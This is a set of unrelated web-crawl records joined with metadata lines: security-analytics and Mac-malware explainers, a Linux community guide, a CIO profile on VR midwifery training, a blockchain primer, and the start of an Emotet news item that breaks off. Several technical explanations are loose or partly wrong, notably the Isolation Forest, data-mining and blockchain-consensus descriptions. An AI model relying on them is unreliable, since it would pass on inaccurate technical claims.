Fortanix Data Security Manager (DSM) is an enterprise key management solution with an integrated, software-defined HSM,certified up to FIPS 140-2 Level 3. Fortanix DSM has a modern, flexible architecture and is developed using an agile development methodology, making it the ideal vehicle for supporting the roll-out of quantum-resistant algorithms in the future. | <urn:uuid:d538a35d-c255-432e-a3a4-97503379f20a> | CC-MAIN-2022-40 | https://www.fortanix.com/blog/2022/08/should-i-be-concerned-about-quantum-computing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00115.warc.gz | en | 0.94165 | 899 | 2.609375 | 3 |
Security Big Data Analytics: Past, Present and Future
Security big data analytics, or cybersecurity analytics, helps security analysts and solution vendors do much more with log and event data. Legacy Security Information and Event Management (SIEM) solutions are limited to manually defining correlation rules, which are brittle, hard to maintain, and result in many false positives.
Machine learning techniques can help security systems identify patterns and threats with no prior definitions, rules, or attack signatures — and with much higher accuracy. However, to be effective, machine learning needs very big data. The challenge is storing more data, analyzing it in a timely manner, and extracting new insights.
In this article:
- How big data analytics helps combat cyberthreats
- Key concepts in big data and security
- Three algorithms for detecting anomalies
- How SIEMs leverage big data analytics
How can security big data analytics combat cyberthreats?
Traditionally, security technologies used two primary analytical techniques to detect security incidents:
- Correlation rules — manually defined rules specifying a sequence of events that indicates an anomaly, which could represent a security threat, vulnerability or active security incident.
- Network vulnerabilities and risk assessment — scanning networks for known attack patterns and known vulnerabilities, such as open ports and insecure protocols.
The common denominator of these older techniques is that they are good at detecting known bad behavior. However they suffer from two key drawbacks:
- False positives — Because they are based on rigid, predefined rules and signatures, there is a high level of false positives, leading to alert fatigue.
- Unknown events — What happens if a new type of attack is attempted that no one had created a rule for? What happens if an unknown type of malware infects your systems? Traditional systems based on correlation rules find it difficult to detect unknown threats.
Advanced threat analytics powered by machine learning
Addressing unknown risks — including insider threats, which are difficult to detect because they are legitimate credentials logged into corporate systems — requires advanced analytics. Advanced threat analytics technology can:
- Identify anomalies in personnel or device behavior — Create a model of “normal” behavior for a person, a device, or a group of devices on the network, and identify anomalies, even ones that were not predefined as rules.
- Detect anomalies in the network — Create a model of network traffic to identify anomalies. Is traffic unusual for this period or time of day?
- Perform machine learning based malware detection — Analyze binaries transmitted by email or downloaded, including those not flagged by antivirus, to understand whether the program is benign or malicious.
- Perform machine learning based intrusion detection — Identify patterns in network traffic or access control that are similar to historic intrusions or attacks.
To achieve these types of analysis, new analytics methods and access to data is needed.
Key concepts in data science, machine learning, and cybersecurity
What is data science?
Data science leverages scientific and mathematical analysis of data sets, as well as human understanding and exploration, to derive business insights from big data.
IN THE CONTEXT OF SECURITY: Data science helps security analysts and security tools make better use of security data, to discover hidden patterns and better understand system behavior.
What is machine learning in cybersecurity?
Machine learning is part of the general field of artificial intelligence (AI). It uses statistical techniques to allow machines to learn without being explicitly programmed.
IN THE CONTEXT OF SECURITY: Machine learning goes beyond correlation rules, to examine unknown patterns and use algorithms for prediction, classification and insight generation.
Important note: Artificial Intelligence (AI) is claimed to be a part of many security analytics solutions. Don’t take vendor claims for granted; check what exactly is included in the term “AI”. How are vendors building their models? Which algorithms are used? Look under the hood to understand what exactly is being offered.
Supervised vs. unsupervised learning
Supervised machine learning
In supervised learning, the machine learns from a data set that contains inputs and known outputs. A function or model is built that makes it possible to predict what the output variables will be for new, unknown outputs.
IN THE CONTEXT OF SECURITY: Security tools learn to analyze new behavior and determine if it is “similar to” previous known good or known bad behavior.
Unsupervised machine learning
In unsupervised learning, the system learns from a dataset that contains only input variables. There is no correct answer, instead the algorithm is encouraged to discover new patterns in the data.
IN THE CONTEXT OF SECURITY: Security tools use unsupervised learning to detect and act on abnormal behavior (without classifying it or understanding if it is good or bad).
What is deep learning in cybersecurity?
Deep learning techniques simulate the human brain by creating networks of digital “neurons” and using them to process small pieces of data, to assemble a bigger picture. Deep learning is most commonly applied to unstructured data, and can automatically learn the significant features of data artifacts. Most modern applications of deep learning utilize supervised learning.
IN THE CONTEXT OF SECURITY: Deep learning is primarily used in packet stream and malware binary analysis, to discover features of traffic patterns and software programs and identify malicious activity.
What is data mining in cybersecurity?
Data mining is the use of analytics techniques, primarily deep learning, to uncover hidden insights in large volumes of data. For example, data mining can uncover hidden relations between entities, discover frequent sequences of events to assist prediction, and discover classification models which help group entities into useful categories.
IN THE CONTEXT OF SECURITY: Data mining techniques are used by security tools to perform tasks like anomaly detection in very large data sets, classification of incidents or network events, and prediction of future attacks based on historical data.
What is user entity behavior analytics (UEBA)?
UEBA solutions are based on a concept called baselining. They build profiles that model standard behavior for users, hosts and devices (called entities) in an IT environment. Using machine learning techniques, they identify anomalous activity, comparing the activity to established baselines to detect security incidents.
The primary advantage of UEBA over traditional security solutions is that it can detect unknown or elusive threats, such as zero day attacks and insider threats. In addition, UEBA reduces the number of false positives because it adapts and learns actual system behavior, rather than relying on predetermined rules which may not be relevant in the current context.
Three algorithms for detecting outliers and anomalies
Random Forest is a powerful supervised learning algorithm that addresses the shortcomings of classic decision tree algorithms. A decision tree attempts to fit behavior to a hierarchical tree of known parameters.
For example, in the tree below, customer satisfaction is distributed according to two variables: product color and customer age. A decision tree algorithm will inaccurately predict that a different color or slightly different age is a good predictor of satisfaction. This is called overfitting—the model uses insufficient or inaccurate data to make predictions on new data.
Random Forest automatically breaks up decision trees into a large number of subtrees or stumps. Each subtree emphasizes different information about the population under analysis. It then obtains the result of each subtree, and takes a majority vote of all the subtrees to obtain the final result (a technique called bagging).
By combining all the subtrees together, Random Forest can cancel out the errors of each individual tree and dramatically improve model fitting.
IN A SECURITY CONTEXT: Random Forest can help analyze sequential event paths and improve predictions about new events, even when the underlying data is insufficient or improperly structured.
Dimension Reduction is the process of converting a data set with a high number of dimensions (or parameters describing the data) to a data set with less dimensions, without losing important information.
For example, if the data includes one dimension for the length of objects in centimeters and another dimension for inches, one of these dimensions is redundant and does not really add any information, as can be seen by their high correlation. Removing one of these dimensions will make the data easier to explain.
Generally speaking, a Dimension Reduction algorithm can determine which dimensions do not add relevant information and reduce a data set with n dimensions to k, where k<n.
Besides correlation analysis, other ways to remove redundant dimensions include analysis of missing values, variables with low variance across the data set, using decision trees to automatically pick the least important variables and augmenting those trees with Random Forest, factor analysis, backward feature elimination (BFE), and principal component analysis (PCA).
IN A SECURITY CONTEXT: Security data typically consists of logs with a large number of data points about events in IT systems. Dimension Reduction can be used to remove the dimensions that are not necessary for answering the question at hand, helping security tools identify anomalies more accurately.
Isolation Forest is a technique for detecting anomalies or outliers. It isolates data points by randomly selecting a feature of the data, then randomly selecting a value between the maximum and minimum values of that feature. The process is repeated until the feature is found to be substantially different from the rest of the data set.
The system repeats this process for a large number of features, and builds a random decision tree for each feature. An anomaly score is then computed for each feature, based on the following assumptions:
- Features which are really anomalies will take only a small number of isolation steps to be far off from the rest of the data set.
- Features which are not anomalies will take numerous isolation steps to become far off from the data set.
A threshold is defined, and features which require relatively long decision trees to become fully isolated are determined to be normal, with the rest determined to be abnormal.
IN THE CONTEXT OF SECURITY: Isolation Forest is a technique that can be used by UEBA and other next-gen security tools to identify data points that are anomalous compared to the surrounding data.
SIEM and Big Data Analytics
Security Information and Event Management (SIEM) systems are a core component of large security organizations. They capture, organize and analyze log data and alerts from security tools across the organization. Traditionally, SIEM correlation rules were used to automatically identify and alert on security incidents.
Because SIEMs provide context on users, devices and events in virtually all IT systems across the organization, they offer ripe ground for advanced analytics techniques. Today’s SIEMs either integrate with advanced analytics platforms like UEBA, or provide these capabilities as an integral part of their product.
Next-generation SIEMs can leverage machine learning, deep learning, and UEBA to go beyond correlation rules and provide:
- Complex threat identification — Modern attacks often consist of several types of events, each of which might appear innocuous on its own. Advanced data analytics looks at data for multiple events over a historic timeline, and captures suspicious activity.
- Entity behavior analysis — SIEMs baseline behavior of critical assets like servers, medical equipment or industrial machinery, and automatically discover anomalies that suggest a threat.
- Lateral movement detection — Attackers who penetrate an organization typically move through a network, accessing different machines and switching credentials, to escalate their privileges for access to sensitive data. SIEMs analyze data from across the network and multiple system resources, and use machine learning to detect lateral movement.
- Insider threats — SIEMs identify that a person or system resource is behaving abnormally. They can “connect the dots” between a misbehaving user account and other data points, to discover a malicious insider, or a compromised insider account.
- Detection of new types of attacks — by leveraging advanced analytics, SIEMs capture and alert on zero day attacks, or malware which does not match a known binary pattern.
Exabeam is an example of a next-generation SIEM with built-in advanced analytics capabilities — including complex threat identification, automatic event timelines, dynamic peer grouping of similar users or entities, lateral movement detection and automatic detection of asset ownership.
Learn more about Cybersecurity Big Data Analytics
Have a look at these articles:
- What UEBA Stands For (And a 5-Minute UEBA Primer)
- What Is UEBA and Why It Should Be an Essential Part of Your Incident Response
- Threat Detection and Response: How to Stay Ahead of Advanced Threats
- User Behavior Analytics (UBA/UEBA): The Key to Uncovering Insider and Unknown Security Threats
- Behavioral Profiling: The Foundation of Modern Security Analytics
A Crash Course on Security Analytics — And How to Spot Fake UEBA From a Mile Away
Exabeam in Action: Stopping Lapsus$ in Their Tracks
Ransomware: Bigger, Better, and Still Going Strong
Exabeam News Wrap-up – Week of September 19, 2022
Exabeam News Wrap-up – Week of September 12, 2022
The 4 Steps to a Phishing Investigation
Subscribe today and we'll send our latest blog posts right to your inbox, so you can stay ahead of the cybercriminals and defend your organization.
See a world-class SIEM solution in action
Most reported breaches involved lost or stolen credentials. How can you keep pace?
Exabeam delivers SOC teams industry-leading analytics, patented anomaly detection, and Smart Timelines to help teams pinpoint the actions that lead to exploits.
Whether you need a SIEM replacement, a legacy SIEM modernization with XDR, Exabeam offers advanced, modular, and cloud-delivered TDIR.
Get a demo today! | <urn:uuid:2fde1d40-49ea-45f5-882c-a37760fe2f40> | CC-MAIN-2022-40 | https://www.exabeam.com/ueba/security-big-data-analytics-past-present-and-future/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00115.warc.gz | en | 0.901224 | 2,813 | 2.765625 | 3 |
Viruses are the common cold of computers: easily spread and often misdiagnosed. The word “virus” is frequently misused in describing other forms of malware. Actual viruses are a small bit of executable code that spreads when users open infected files or applications. A few viruses that affect Mac OS X have been found, and Mac users can also inadvertently spread Windows viruses by passing along infected files.
A Trojan horse is like the college roommate that seems cool until they stop paying rent, eat your food and leave dirty clothes everywhere. It enters under the pretense of usefulness but actually contains malicious code. Several Trojan horses affect Mac OS X, most notably the Flashback Trojan.
Worms are like the elusive varmint scurrying through the insulation in your wall. Because they don’t need to attach themselves to an existing file or program, they can be very difficult to find. A type of virus, worms spread over networks, and can carry out malicious actions once they find new hosts.
Spyware is like the creepy neighbor that stares in your window and shuffles through your mail. It enters your Mac as a Trojan horse and then secretly monitors your computing behavior, collecting personal information such as surfing habits and web sites you’ve visited.
A botnet is like an army of zombie computers bent on destruction. Your Mac could be forced to join the zombie army as a consequence of a malware attack. The network of compromised computers is then used to send spam or to attack other computers.
Spam is the mosquito of the computer world: annoying and ubiquitous. A single spam message can be dealt with easily enough, but en masse it can crowd your inbox and cause a significant loss of productivity.
An exploit is like a schoolyard bully that zeroes in on your weaknesses. It’s a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to break through your Mac’s security defenses. | <urn:uuid:1f58b533-820d-4cb6-89f3-64f60384ee7b> | CC-MAIN-2022-40 | https://www.intego.com/mac-malware-definitions | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00115.warc.gz | en | 0.927637 | 436 | 3.25 | 3 |
Linux is a series of open source software operating systems first released in 1991. Named after its principal author Linus Torvalds and initially only developed for personal computers, it is now the most versatile family of operating systems, used on everything from smartphones to servers.
Due to its reputation as a robustly stable open license product, a loyal community has developed to continually improve and expand Linux. Consequently, there is a sea of information available for users and developers to consult. It can be overwhelming to navigate such a surplus of resources, so we’ve compiled a list of some of the most valuable ones to help you find what you need.
Linux User Groups
Linux user groups, also known as a LUG, are typically non-profit collectives of people that network, discuss Linux, provide support for other users, establish education initiatives, and further the development of Linux. Groups are often formed based on location to allow for meetups and planning local events. However, there are some groups that exist entirely online. Additionally, there are global groups, like LinuxChix, which focuses on women in the Linux community. Given Linux’s popularity, it’s no surprise that hundreds of groups exist around the globe.
One of the oldest and largest groups, SVLUG, located in Silicon Valley, has been in existence since 1988 before Linux was even released. Initially formed as a PC-Unix Special Interest Group of the Silicon Valley Computer Society, they quickly evolved into a dedicated Linux user group that has hosted Linus Torvalds at several of their meetings.
Since groups continue to pop up, no comprehensive, continually managed list exists, but local groups can be found through a quick google search.
Online forums can hold the answers to the most obscure questions, but they are a double-edged sword. In addition to the wealth of answers to niche questions, users can also suffer sheer information overload, or worse, get dangerous misinformation. Below are the three trustworthy Linux forums.
Linux – It makes sense that a reliable source of information would be on the main Linux website. There are a number of well-organized forums, with topics ranging from “General Linux” to “Advanced Linux Tutorials.” Linux recently overhauled its website and purged a large amount of content, so the forums only date back to 2017, which means there’s a smaller chance of you stumbling upon outdated information. The main website also hosts an impressively thorough set of man pages for anyone in need of an explanation of any Linux command.
Linux Questions – One of, if not the most, active Linux forums is Linux Questions. One of the most popular topics is “Newbie,” where new users can ask any question and receive assistance from any number of generous expert users. One advantage of this forum is that members are assigned a reputation score, indicating both the number of posts they’ve made, and how helpful people have found them.
Reddit – Though we certainly won’t vouch for the veracity of the rest of the site, the Linux subreddit is very well moderated. One big benefit of Reddit’s notoriety is its ability to attract well known people. Linux is no exception. The subreddit often hosts ‘Ask Me Anything’ (AMA) sessions in which users can ask questions of notable experts. Some AMA guests include the founder of Bedrock Linux, Red Hat CEO Jim Whitehurst, and Nat Friedman, the CEO of GitHub.
We know writing about a blog on a blog is getting a little meta, but there a number of excellent Linux blogs that are worth following for the latest news.
Linux Foundation – Founded in 2000, the Linux Foundation is a non-profit that focuses on standardizing and helping to grow Linux. Since they are a direct supporter of the work of Linux founder Linus Torvalds and Greg Kroah-Hartman, a primary Linux developer, the foundation’s blog is a must read for Linux devotees.
Linux Journal – The first magazine about Linux to be published, this magazine and its corresponding blog specialize in news, reviews, and recommendations for Linux experts.
SUSE – SUSE is the original provider of enterprise Linux distribution, and continues to provide enterprise-grade open source solutions and support. As such a leader in the field, their blog is full of useful information for organizations using Linux. | <urn:uuid:1aaff624-df64-4daf-a5d4-72b6cdc41575> | CC-MAIN-2022-40 | https://www.helpsystems.com/blog/linux-user-groups-forums-blogs | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00115.warc.gz | en | 0.945589 | 903 | 2.828125 | 3 |
If a midwife can’t identify the position of the placenta and lets the woman go into natural labour with the baby obstructed, the baby’s life is at serious risk.
“At the moment we teach with dolls and pelvises, and I can tell you firsthand from being a student as well as an educator, the position of the placenta is one of the hardest things to learn, and yet it’s absolutely one of the most imperative things to know,” says University of Newcastle lecturer in midwifery Donovan Jones.
Since earlier this year, students now have a new tool to help them understand the issue and learn how to deal with it.
Road to Birth is a virtual reality app which takes users on “a journey through pregnancy”, depicting a life-size female figure, whose gestation can be explored and observed, including crucial birth considerations like the baby’s orientation and placental positioning.
It is one of six immersive technology solutions for the university’s Faculty of Health and Medicine which has been developed and implemented over the last 18 months by the University of Newcastle IT Services team in close collaboration with educators.
The benefits of the tools are multitude.
“Simulation labs typically comprise of a physical lab space set-up to mirror a typical birthing suite of a hospital, with an attached control room to manage scenarios, using rubber sim-babies and a variety of medical equipment. These labs are timetabled at specific times of the semester around resourcing and are expensive to set-up and run and are limited by practitioner availability,” explains University of Newcastle chief information officer Anthony Molinia.
Now students benefit from “anytime/anywhere access” to the learning tools, which they can use to practice as many times as is required. That’s particularly useful given the relatively high levels of students from low socio-economic backgrounds who often have to work during lab hours.
There’s also the opportunity for the immersive experiences to be gamified to improve learning outcomes.
“There was also an unexpected emotional reaction at times to the VR simulations. This provided the teaching staff more effective and deeper insights – which can be utilised to help better emotionally prepare the students for the real world scenarios,” Molinia adds.
There have been knock-on effects too, such as a shift in thinking around the reliance on complicated timetabling given so much learning at the university happens out of hours and off campus. The roll-out has also generated commercial interest in the unique proposition.
Listen and collaborate
The immersive technology projects were undertaken with close collaboration between the faculty, students and IT, utilising human centred design and lean canvas techniques.
“This in itself was challenging given the need to focus on outcomes in a ‘time and cost box’ as well as taking an iterative approach to solution development…It led to standing up a bespoke ‘innovation space’ for open collaboration, design thinking and iterative testing and development,” Molinia explains.
The closer collaboration between IT and stakeholders is borne out of Molinia’s work over the last 24 months to “gain trust” from faculties and the university’s leadership team.
Molinia went on a ‘listening tour’ soon after joining the university “to understand what was working well, what wasn’t working well and what their key imperatives were for the future,” he says.
That listening continues today in the form of an IT Performance Dashboard which includes customer sentiment, and a ‘360 degree feedback channel’.
“In combination these actions increased our presence in the organisation, facilitated IT being included ‘at the table’ and provided us with the ability to have a voice from the ranks through to the leaders,” Molinia says, adding that the result is a roughly 40 per cent increase in IT investment over the next seven years.
And as the IT function has evolved into a trusted advisor and strategic partner to the university, within it has become more “cohesive and effective” department with a “positive, inclusive and fun culture”.
Keep your balance
Molinia says that the biggest lesson he has learned over his career as a CIO is to maintain balance and perspective.
“That is balance and perspective across everything, whether it be attention to innovation verses commodity; work verses fun; asking for permission verses asking for forgiveness; picking your battles verses fighting every one; or taking time to reflect and think verses trying to go too fast,” he says.
“It has provided me with an empathy and self-awareness that I believe is critical to be a good leader, motivator and mobiliser or innovation,” he adds. | <urn:uuid:179f6de9-da6a-4611-babf-39b05a58e58a> | CC-MAIN-2022-40 | https://www.cio.com/article/214280/cio50-2018-26-50-anthony-molinia-university-of-newcastle.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00115.warc.gz | en | 0.957327 | 999 | 2.875 | 3 |
As a leader in your organization, you have a duty to your organization to understand why blockchain technology will transform the economy.
Why was blockchain started?
The bursting of the U.S. housing bubble underpinned the global financial crisis of 2007-08 and caused the value of securities linked to the U.S. real estate to nosedive. Easy access to subprime loans and the overvaluation of bundled subprime mortgages all leaned on the theory that housing prices would continue to climb.
Ultimately, the Financial Crisis Inquiry Commission determined the entire financial crisis was avoidable and caused by widespread failures in financial regulation and supervision. There were many reasons for the financial crisis, including subprime lending, the growth of the housing bubble and easy credit conditions. The world believed that “trusted third parties” such as banks and financial institutions were dependable. Unfortunately, the global financial crisis proved intermediaries are fallible. The crisis resulted in evictions, foreclosures and extended unemployment; it was considered the worst financial crisis since the Great Depression.
In response to this horrible global financial upheaval, in 2008, Satoshi Nakamoto wrote a paper titled, “Bitcoin: A Peer-to-Peer Electronic Cash System.” The paper suggested that “trusted third parties” could be eliminated from financial transactions.
What’s Bitcoin and how does it relate to blockchain?
Bitcoin is a peer-to-peer system for sending payments digitally signed to the entire Bitcoin network. When the “b” is capitalized, “Bitcoin” refers to that network, e.g., “I want to understand how the Bitcoin network operates.” When the “b” is not capitalized, the word “bitcoin” is used to describe a unit of account or currency, e.g., “I sent 1 bitcoin to a friend.” The digital signature is made from public keys (given to anyone for sending assets) and private keys (held by the asset owner).
The public ledger of Bitcoin transactions is called a blockchain. Bitcoin also runs on top of a technology called blockchain. Blockchains are permissionless distributed databases or permissionless public records of transactions in chronological order. Blockchain technology creates a decentralized digital public record of transactions that is secure, anonymous, tamper-proof and unchangeable — a shared single source of truth. Blockchains apply to any industry where information is transferred and roughly fall into the following six classifications:
1. Currency (electronic cash systems without intermediaries).
2. Payment infrastructure (remittance; sending money in payment).
3. Digital assets (exchange of information).
4. Digital identity (IDs for digitally signing to reduce fraud).
5. Verifiable data (verify the authenticity of information or processes).
6. Smart contracts (software programs that execute without trusted third parties).
How blockchains work
For the first time in history, blockchain removes — or disintermediates — the middleman from business transactions and by doing so improves the value of existing products, services and interactions in the following ways:
Preventing double spending: With blockchain, you can’t spend money more than once. Blockchain presents a solution by ensuring the authenticity of any asset and preventing duplicate expenditures (real estate, medical claim, insurance, medical device, voting ballots, music and government record or payments to program beneficiaries).
Establishing consensus: In this new model, crowds are networks of computers that work together to reach an agreement. Once 51% of the computers in the network agree, “consensus” has been reached and the transaction is recorded in a digital ledger called the blockchain. The blockchain contains an infinite ordered list of transactions. Each computer contains a full copy of the entire blockchain ledger. Therefore, if one computer attempts to submit an invalid transaction, then the computers in the network would not reach consensus (51% agreement) and the transaction would not be added to the blockchain.
There are four principles of blockchains networks.
- Distributed: Across all the peers participating in the network. Blockchain is decentralized, and every computer (full node) has a copy of the blockchain.
- Public: The actors in a blockchain transaction are hidden, but everyone can see all transactions.
- Time-stamped: The dates and times of all transactions are recorded in plain view.
- Persistent: Because of consensus and the digital record, blockchain transactions can’t catch fire, be misplaced or get damaged by water.
Steps to create a block (transaction)
Blocks are a record of transactions and chains are a series of connected transactions (blocks).
- Create transaction: A miner (computer) creates a block.
- Solve the puzzle: A miner (computer) must do mathematical calculations and if correct will receive a “proof of work.”
- Receive “proof of work:” If the puzzle is solved — the “proof of work” is a piece of data that is difficult (costly, time-consuming) to produce but easy for others to verify and which satisfies certain requirements. In short, it’s difficult to solve the puzzle but easy to verify it’s solved correctly.
- Broadcast “proof of work:” The miner broadcasts its successful proof of work to other miners.
- Verification: Other miners verify the “proof of work.”
- Publish block: If the miners reach consensus (51% agreement) that the proof the miner presented solved the puzzle, then that transaction is published to the blockchain.
Why are blockchains secure?
With blockchain technologies, truth can also be measured and consumers and producers can prove data is authentic and uncompromised.
To create a new block, block 101, some of the data is used (or a hash is created by an algorithm that turns an arbitrarily large amount of data into a fixed-length random number) from the previous block, block 100. Then to create the new block 102, information from block 101 is used, and so on. Transactions are dependent on the prior transaction. Similar to a light string on a Christmas tree. If a light bulb were pulled from the string (changing a transaction), the miner would have to change every previous transaction ever made in that string. Probabilistically this is almost impossible, as not everyone would reach consensus on the proposed change.
The result is an immutable digital record for every agreed transaction: a single source of truth.
Why blockchain technologies will transform the world
Blockchain technologies will improve trust in industries where information (assets) is transferred, including these:
- Accounting (auditing and fraud prevention).
- Aerospace (location of parts and chain-of-custody).
- Energy (smart metering and decentralized energy grid).
- Healthcare (medical devices and health information interoperability).
- Finance (remittance and currency exchange).
- Real-estate (deeds transfer and speed buying or selling property).
- Education (better manage assessments, credentials, transcripts).
Blockchain technologies will change everything — from clothes you wear, the food you eat and even the products you buy. | <urn:uuid:fec36218-fc70-4690-96c7-4b84a3356b8a> | CC-MAIN-2022-40 | https://www.cio.com/article/238992/if-i-only-had-5-minutes-to-explain-blockchain.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00115.warc.gz | en | 0.921726 | 1,480 | 2.875 | 3 |
Data democratisation extends data access to everybody (or nearly everybody) within an organisation. The process of data democratisation also involves ensuring that non-technical employees feel comfortable working with and interpreting your company’s data.
Without your IT department acting as the gatekeepers to your company’s data, a broader range of stakeholders can draw insights from it and use it to inform their work.
Data democratisation means people encounter less friction when accessing data, leading to greater fluidity and encouraging quick and creative decision-making. For example:
- Sales teams have easy access to data about leads and prospective customers
Marketing can access data about conversions to improve their content
Helpdesk teams can access application usage data to better support colleagues with technical issues
In a “data-democratised” workplace, these teams no longer have to request permission to access restricted data silos—they’re empowered to take the initiative and use data in a way that best serves the company.
But while the benefits of data democratisation are clear, you must lay a foundation of good governance, clear policies and strong security before embarking on the data democratisation process.
Use the Right Tools For the Job
Data democratisation doesn’t mean simply giving everyone access to raw data—or even preparing visualisations of data that can be understood by non-technical staff.
To truly democratise your data, you must give people free access to “real-world” data —and ensure they can make sense of the data and use it to inform their work.
This means using the right tools to present your data in an accessible and understandable way.
You might require multiple tools to provide meaningful access to different data types and for different purposes. The data requirements of helpdesk teams vary considerably from those of marketing departments, for example.
You also need to ensure technically-minded staff can assist their non-technical colleagues—by answering their questions and supporting them to make sense of the data.
Data democratisation shouldn’t mean data anarchy: the process must be carefully managed.
For example, it should go without saying that wider access to a company’s data doesn’t mean every employee gets to read their colleagues’ HR files.
Compliance comes first, and your data democratisation project will be constrained by legal requirements arising from laws like the General Data Protection Regulation (GDPR) in the EU, or the California Consumer Privacy Act (CCPA) in the US.
That said, these regulations are not incompatible with a well-managed, rational data democratisation project. They might mean anonymising personal data where possible, and only extending access to non-personal data as far as is appropriate.
Your security controls must also be informed by clear data protection and security policies and a culture of data protection.
Ensure Good Data Governance
A solid data governance program is vital to underpin any data democratisation project.
Good data governance reduces the likelihood of data security incidents—for example, by setting rational retention periods to manage when old data is deleted, or by prohibiting the collection of unnecessary personal data.
Data governance also helps organisations to get the most of their data, by improving data quality and ensuring that there is a solid process for data sharing.
The general principle of data democratisation is that broader access to data is good for the organisation. But diligent data governance is required to make the process work. | <urn:uuid:5498a34a-e309-46ee-8407-fbe50dc0cbec> | CC-MAIN-2022-40 | https://www.grcworldforums.com/democratisation-data-analytics-/data-democratisation-three-foundation-stones/3762.article | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00115.warc.gz | en | 0.905429 | 713 | 2.5625 | 3 |
Best Practices for selecting and implementing Machine Learning Systems
Walk into any executive-level meeting these days, and you’ll hear plenty of chatter about machine learning (ML) and artificial intelligence (AI), but what do they really mean? ML is complex because it includes concepts from multiple areas, such as mathematics, computer science, statistics, and logic. These are all highly technical and seldom explained in a simple manner. Let us introduce a few key ML and AI technical terms and how people apply these techniques and share some best practices and challenges for implementing ML systems using these technologies.
What are some basic terms you need to know?
ML is artificially intelligent self-learning system that use data mining, pattern recognition, and natural language processing to mimic human reasoning. It includes a training phase where the system learns from training data. For instance, a ML algorithm can learn to predict health or disease by analyzing all of the data generated by medical specialists.
A successful implementation of aML system requires a common understanding of the objectives between business and technology teams
Artificial intelligence is the study of how to make computers do things that people are better at, or would be better at, if they could extend what they do to a large amount of data and not make mistakes.
Supervised learning systems leverage training data of input values and associated output values also called labeled data. For example, a machine learning system can be trained using a set of images of cats and dogs, and when given a new image, the system can then predict whether it is a cat or a dog. Similarly, a supervised learning system can leverage logistic regression techniques and historical data to predict the value of a variable such as future market indices.
Unsupervised learning systems have an ability to learn and figure things out from unlabeled data. For example, an unsupervised machine learning system can learn how to group (also called clustering) a series of news articles under different categories without explicitly being told how to do it.
Reinforcement learning systems have the ability to not only learn from training data but also improve their performance by processing external feedback. For example, the system that selects your favorite music list uses your feedback from previous choices and improves its selections on an ongoing basis.
Neural networks use supervised learning and were originally developed to emulate the human brain, which uses an extremely large network of neurons to process information. A simple neural network consists of a single layer of neurons that connects input data to output data.
Deep learning systems are neural networks with many layers, and the learning performed by them is called “deep learning.”
What are some successful applications of ML?
Now that you have some familiarity with ML and AI, let us look at a few examples of successful applications of these technologies:
• Customer profile analysis to understand and retain the most loyal customers, as well as target new customers
• Fraud and anomaly detectionusing clustering techniques
• Medical diagnosis, self-driving vehicles, and facial recognition using deep learning
• Recommender systems using reinforcement learning
What are some best practices for implementing ML systems?
• A successful implementation of aML system requires a common understanding of the objectives between business and technology teams. There must be an agreed upon set of metrics to evaluate and measure the performance of the system.
• Special attention should be paid if the machine learning systems are expected to provide an explanation of their decision making process. Typically, machine learning systems are not very good at providing this detail. Experience suggests that in such cases, it is good to include a human expert during the overall process so that the ML system plays a support role in identifying best possible options, butthe human experts make the final decision.
• There must be proper guidelines for when ML systems should be retrained with new data. Depending on the domain, the training data used for building a ML system may not continue to be relevant after a period of time due to changes in other external factors. Therefore, it is important to have well-defined criteria for retraining the system with new data. This can be done as frequently as daily (e.g., setting price values) or after specific events(e.g., when new products or versions are introduced into the market). It is important to ensure appropriate support from the underlying IT and governance processes.
There are also potential organizational challenges worth watching:
• A common challenge that many enterprises face is lack of a cohesive leadership to drive ML and AI practices. Often, you find too many leaders racing against each other. It is important to have an AI strategy at an organization level that is aligned around enterprise data strategy, information security, governance, and compliance requirements.
• The next challenge is selecting the right use-case to implement. A few ideas to explore include looking for areas with high revenue but low efficiency, or business processes experiencing common errors.Additional factors to consider include availability of relevant data, business champions, and willingness to learn and adapt.
• The demand for AI talent will always be high compared to the availability of skilled resources within an organization. Consider bringing in outside talent by partnering with schools or universities, developing training classes and courses, and encouraging on-the-job training.
Today, there is a lot of buzz around ML and AI, and many C-level executives across many industries are very interested in building out a successful practice for these technologies. If you are just beginning your ML and AI journey, don’t fret, you’re not alone. Many of your colleagues are also just entering this burgeoning field. As you move forward with introducing ML and AI to your organization, consider starting small, identifying and building a few use-cases, and learning and growing your technologies from there. | <urn:uuid:bb00e0be-cce8-4778-a453-b746e77d9be1> | CC-MAIN-2022-40 | https://artificial-intelligence.cioreview.com/cxoinsight/best-practices-for-selecting-and-implementing-machine-learning-systems-nid-27236-cid-175.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00115.warc.gz | en | 0.944577 | 1,161 | 3.15625 | 3 |
Emotet’s unpopular computer program has also changed its tactics, with an email campaign being spread by vicious Excel files, researchers found.
Researchers at Palo Alto Networks Unit 42 have identified a new high-volume malware infection, known for altering and modifying viruses to prevent detection and continue its malicious activity, they wrote in a report published online. Tuesday.
